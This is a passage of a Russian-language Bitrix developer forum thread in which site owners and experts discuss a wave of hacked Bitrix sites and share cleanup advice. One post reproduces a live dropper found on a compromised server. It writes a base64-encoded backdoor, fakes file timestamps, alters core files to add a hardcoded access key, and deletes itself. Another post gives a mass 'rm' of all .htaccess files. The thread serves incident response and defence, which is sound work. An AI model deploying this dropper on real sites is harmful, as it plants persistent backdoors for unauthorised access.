Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 239987

Заглянувший

Сообщений: 10 Регистрация: 04.02.2014

#576

09.03.2023 17:53:04

Цитата
написал: signer_default_key

Сменить ключ в БД и сбросить кеш сайта

Код

$oldKey = \Bitrix\Main\Config\Option::get('main', 'signer_default_key', false); 
\Bitrix\Main\Config\Option::set('main', 'signer_default_key', hash('sha512', uniqid(rand(), true)));

echo "OldKey was: $oldKey\n";

Приношу почтение, за сим и прощаюсь.
*** Ubi nill velis, ibi null vales...

Пользователь 529315

Заглянувший

Сообщений: 2 Регистрация: 18.03.2016

#577

10.03.2023 09:14:13

Добрый день.
Может где-то писали уже.
Вариант внедрений.
Папка /bitrix/tools/vote/ создается что-то вроде script-8.php с содержимым

<?php
@mkdir($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/vote");
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php", base64_decode("PD8KJHZsID0gJ2tlJy4neSc7CmlmKCRfUE9TVFsnYnh1X2luZm8nXVsncGFja2FnZUluZGV4J109PT0ncEluZGV4MTAxJyYmJF9QT1NUWyR2bF0hPT0nZ2FkZjRlNTdlJyl7CiAgICBkaWUoImhhY2sgYXR0ZW1wdCIpOwp9CnJlcXVpcmVfb25jZSgkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdLiIvYml0cml4L2FkbWluL2ZpbGVtYW5faHRtbF9lZGl0b3JfYWN0aW9uLnBocCIpOwo/Pg=="));
touch($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php",filemtime($_SERVER["DOCUMENT_ROOT"]."/bitrix/index.php"));
unlink ($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/main.file.input/main.php");
$buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js");
if(strpos($buf, "s=document")>0) {
$buf = preg_replace("!(s=document.*?appendChild$s$);!ism", "", $buf);
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js", $buf);
};

$buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php");
if(strpos($buf, "echo ")>0) {
$buf = preg_replace("!(echo.*?script>\";)!ism", "", $buf);
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php", $buf);
};

$buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php");
if(strpos($buf, "spell_word")>0) {
$buf = preg_replace("!HTTP_S'] == \".*?\"!ism", "HTTP_S'] == \"g308bad51\"", $buf);
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php", $buf);
};
echo (240222); unlink ("script-8.php");

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#578

10.03.2023 09:18:17

Макс Кучин,
это говорит о том, что у Вас не обновлённое ядро с уязвимым модулем vote
удалите папки
/bitrix/tools/vote/
/bitrix/modules/vote/

и главное - обновитесь

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7113002

Заглянувший

Сообщений: 1 Баллов: 2 Регистрация: 10.03.2023

#579

10.03.2023 13:11:26

Всем привет!

Если у кого осталась проблема с постоянной заменой .htaccess и корневого index.php, то можно попробовать следующее:

Код
ps aux | grep "php"
Вводим в ssh-консоли данную команду, и находим постоянно работающий процесс и запоминаем ID процесса, например, ID равен 22233. О процессах указывалось ранее на форуме, спасибо за подсказку!
В моем случае файл назывался lock666.php и больше постоянно работающих процессов не было, другие варианты файла могут быть перечислены в измененном .htaccess: <FilesMatch "^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$">...

p.s. Интересно сделано, файл само удаляется, но работает из оперативы, как я понял.
Убиваем данный процесс, зная его ID:
Код
kill 22233
Утилитой, например, через AI-Bolit проверяем файлы и удаляем шеллы;
Иногда тот же AI-Bolit может пропустить скрипты, поэтому дополнительно можно поискать руками наличие в php строк eval(), preg_replace(), gzuncompress(), base64_decode() и удалить шеллы или починить битые файлы. К сожалению в Битрикс таких файлов оооочень много:
Код
grep -R 'base64_decode(' --include \*.php -o
Еще полезно включить серверные логи и смотреть к каким файлам стучатся боты, чтоб их тоже снести, может какие-то были пропущены утилитой или руками.
Так же можно посмотреть файлы шеллов и искать по паттернам, которые используются в шеллах, например в коде может встречаться return substr.
Проверяем корневые папки upload, images, css (может еще какие популярные папки) на наличие php-скриптов и удаляем ненужные:
Код
find . -type f -name "*.php"
Обновляем Битрикс, модули и решения;
Проверяем модифицировалось ли ядро Битрикс:
Код
/bitrix/admin/checklist.php?lang=ru
Можно восстановить файлы ядра Битрикс. При открытии ссылки ниже, появится доп. вкладка (12 в ссылке - это текущее число):
Код
/bitrix/admin/update_system.php?BX_SUPPORT_PROTOCOL12=Y

p.s. Так же, если в каждой папке у вас .htaccess, то можно снести их все, предварительно сохранив и исправив нужные, и закинув их обратно после удаления, например, корневой .htaccess.
Удаляем командой, через ту же консоль:

Код
find . -type f -name "*.htaccess" -exec rm -v {} \;

В общем, после выполнения данных процедур проблем пока замечено не было. Удачи с починкой!

https://t.me/aleev_ruslan

Пользователь 693489

Заглянувший

Сообщений: 4 Регистрация: 19.09.2016

#580

10.03.2023 15:09:27

Цитата

написал:

Цитата
avisol написал: самособранные панели на Ubuntu.

На последнем исследуемом пациенте те же симптомы плюс к тому /upload/ не закрыта, но с загрузкой файла сомневаюсь - это ручная работа, что врят ли.
Тут скорее всего робот + дыра в безопасности.

Да. У меня в папке /upload/esol.importxml/990
появился файл admin.php

Пользователь 29699

Заглянувший

Сообщений: 25 Баллов: 1 Регистрация: 16.09.2008

#581

11.03.2023 08:35:45

Коллеги, добрый день
Тоже несколько сайтов клиентов были взломаны. По цепочке логов вроде получилось отследить, что через /bitrix/tools/html_editor_action.php и /bitrix/tools/spread.php
Подскажите, если я поставил пароль через .htaccess и .htpasswd на папку /bitrix/tools/, ниче для клиентов не должно сломаться?) Или не рекомендуется так делать?

Пользователь 7115360 Заглянувший Сообщений: 1 Регистрация: 11.03.2023	#582 11.03.2023 11:19:27 Здравствуйте.. такая же фигня с сайтом.. есть кто может помочь исправить я сам не справлюсь.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#583

11.03.2023 11:48:55

Цитата
Роман Баринов написал: Здравствуйте.. такая же фигня с сайтом.. есть кто может помочь исправить я сам не справлюсь.

Лицензия на Битрикс актуальная? обновления стоят?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#584

11.03.2023 14:41:38

Цитата

написал:
Коллеги, добрый день
Тоже несколько сайтов клиентов были взломаны. По цепочке логов вроде получилось отследить, что через /bitrix/tools/html_editor_action.php и /bitrix/tools/spread.php
Подскажите, если я поставил пароль через .htaccess и .htpasswd на папку /bitrix/tools/, ниче для клиентов не должно сломаться?) Или не рекомендуется так делать?

1. spread.php - удалить.
2. В html_editor_action.php в начале прописать

Код
if(!empty($_POST)) die();

3. Обновиться

Пользователь 17972 Заглянувший Сообщений: 25 Баллов: 2 Регистрация: 22.11.2007	#585 13.03.2023 15:16:14 Так же проверяйте крон. Вот такое на одном из сайтов нашел https://i.imgur.com/ZFqsQvW.png

Пользователь 7122482

Заглянувший

Сообщений: 5 Регистрация: 14.03.2023

#586

14.03.2023 11:19:54

Добрый день. У нас так же сломали сайт. Но при всем этом он нормально работал для покупателей, баннер с конституцией появлялся только при попытке зайти по локалке. Пришло время установить сертификаты минцифры и выяснилось, что пароли не подходят, зайти физически на серв не удается. Отдали сервер "сертифицированному партнеру", в итоге уже неделю нет прогресса. Остальные спецы не берутся. Лицензия битрикс актуальна, по обновлениям не могу сказать, так как серв не трогали больше двух лет. Находимся в г. Тюмень. Кто то может решить проблему?

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#587

14.03.2023 11:33:32

Илья Замяткин, уточните про хостинг сайта - это физический сервер?
расшифруйте "зайти физически на серв не удаётся" - с консоли не пускает под рутовым паролем?
какая ОС на сервере?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7122482

Заглянувший

Сообщений: 5 Регистрация: 14.03.2023

#588

14.03.2023 12:20:47

Цитата
написал: Илья Замяткин , уточните про хостинг сайта - это физический сервер?

Все верно. Физический сервер

Цитата
написал: расшифруйте "зайти физически на серв не удаётся" - с консоли не пускает под рутовым паролем?

Да, ни один пароль из ранее рабочих не подходит. Рутовый в том числе (не исключаю утрату рутового пароля)

Цитата
написал: какая ОС на сервере?

OC не могу сказать, никто уже не помнит. А в консоли Bitrix vm appliance 7.4(с версией могу ошибаться)

Пользователь 1329903

Эксперт

Сообщений: 299 Баллов: 45 Регистрация: 15.08.2017

#589

14.03.2023 12:45:47

Цитата
Илья Замяткин написал: Да, ни один пароль из ранее рабочих не подходит. Рутовый в том числе (не исключаю утрату рутового пароля)

Загрузиться с загрузочного диска. Например GParted Live.
Чрутнуться в систему и сбросить пароль. Дел на 5 минут.

http://wiki.rosalab.ru/ru/index.php/Восстановление_системы_из_chroot

Пользователь 7122482

Заглянувший

Сообщений: 5 Регистрация: 14.03.2023

#590

14.03.2023 13:07:56

Цитата
написал: Загрузиться с загрузочного диска. Например GParted Live.Чрутнуться в систему и сбросить пароль. Дел на 5 минут.

Не спорю, но это для знающего человека 5 минут. Я с линуксом знаком ровно настолько, насколько ПТУшник с бозоном Хиггса. В любом случае, даже после удачного рута, я понятия не имею что делать дальше, чтоб это всё начало работать должным образом

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#591 14.03.2023 13:09:44 Илья Замяткин, начните с того из какого Вы города, т.к. в Вашем случае работать удалённо не получится Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7122482

Заглянувший

Сообщений: 5 Регистрация: 14.03.2023

#592

14.03.2023 13:13:08

Цитата
написал: Илья Замяткин, начните с того из какого Вы города, т.к. в Вашем случае работать удалённо не получится

Я отписался в первом сообщении. Находимся в г. Тюмень

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#593

14.03.2023 13:35:43

Цитата

Илья Замяткин написал:

Цитата
написал: Илья Замяткин , начните с того из какого Вы города, т.к. в Вашем случае работать удалённо не получится

Я отписался в первом сообщении. Находимся в г. Тюмень

Точно, извиняюсь не увидел.
Тут я пас, я из Новосибирска.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7122482 Заглянувший Сообщений: 5 Регистрация: 14.03.2023	#594 14.03.2023 13:46:49 Алексей Вдовин, если самостоятельно всё таки рутну серв. То удаленно решить проблему тоже не получится? Условно через какой нибудь zoho? Просто надежда на местных специалистов стремится к нулю

Пользователь 125898

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 14.04.2012

#595

14.03.2023 16:10:45

Цитата
написал: Виталий Панкратов, как его сменить?

В таблице b_option он лежит

Пользователь 7124090

Заглянувший

Сообщений: 1 Регистрация: 14.03.2023

#596

14.03.2023 18:51:32

Ребята привет
Помогите..вот такая беда....как решить?

7865	13.03.2023 16:31:38	Попытка внедрения PHP	$_SERVER["REQUEST_URI"]	82.145.222.221	/bitrix/templates/aspro_optimus/css/. ./images/arrows_big.png		/bitrix/templates/aspro_optimus/css/. ./images/arrows_big.png

и таких много

Пользователь 47602 Посетитель Сообщений: 29 Баллов: 4 Регистрация: 24.08.2009	#597 14.03.2023 22:51:40 И снова аспро.. у меня кстати тоже с аспро взломали если что

Пользователь 693489

Заглянувший

Сообщений: 4 Регистрация: 19.09.2016

#598

15.03.2023 09:15:11

Цитата
написал: И снова аспро.. у меня кстати тоже с аспро взломали если что

У меня аспро, интек, самописный.
Разницы нет походу. Это дыра именно где то в битриксе, а не решениях

Пользователь 693489 Заглянувший Сообщений: 4 Регистрация: 19.09.2016	#599 15.03.2023 09:16:59 Что имею на сегодня Два сайта на редакции Старт после обновления пока не ломались сейчас один на стандарте и малом бизнесе пока ловят вирусы, но уже полегче, быстро восстановить можно, но все таки грустно!

Пользователь 102402 Постоянный посетитель Сообщений: 125 Баллов: 19 Регистрация: 09.10.2011	#600 15.03.2023 09:33:46 У меня не Аспро, но тоже словил (на давно не обновлявшемся сайте, редакция Бизнес). Ломали похоже через editor. Тут выше постили ссылку на PDF, где описаны векторы атаки. Аспро просто популярны, поэтому чаще попадаются сайты на них. Но от решения не зависит, факт.

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером